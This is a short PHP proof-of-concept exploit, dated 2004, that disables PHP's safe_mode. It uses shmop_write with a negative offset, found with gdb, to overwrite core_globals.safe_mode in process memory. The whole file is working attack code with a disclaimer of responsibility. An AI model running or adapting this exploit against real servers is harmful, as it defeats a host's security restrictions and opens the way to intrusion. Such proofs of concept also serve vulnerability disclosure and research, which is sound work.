<?
/*
Php Safe_mode Bypass Proof of concept.

Copyright 2004 Stefano Di Paola stefano.dipaola[at]wisec.it

Disclaimer: The author is not responsible of any damage this script can
cause
-SECU
*/

$shm_id = shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) {
echo "Couldn't create shared memory segment\n";
die;
}

// $data="\x01";
// the new value for safe_mode
$data="\x00";

// this (-3842685) is my offset to reach core_globals.safe_mode
// taken with gdb. (0x40688d83)
$offset=-3842685;
// Lets write the new value at our offset.
$shm_bytes_written = shmop_write($shm_id, $data, $offset );
if ($shm_bytes_written != strlen($data)) {
echo "Couldn't write the entire length of data\n";
}

//Now lets delete the block and close the shared memory segment
if (!shmop_delete($shm_id)) {
echo "Couldn't mark shared memory block for deletion.";
}
shmop_close($shm_id);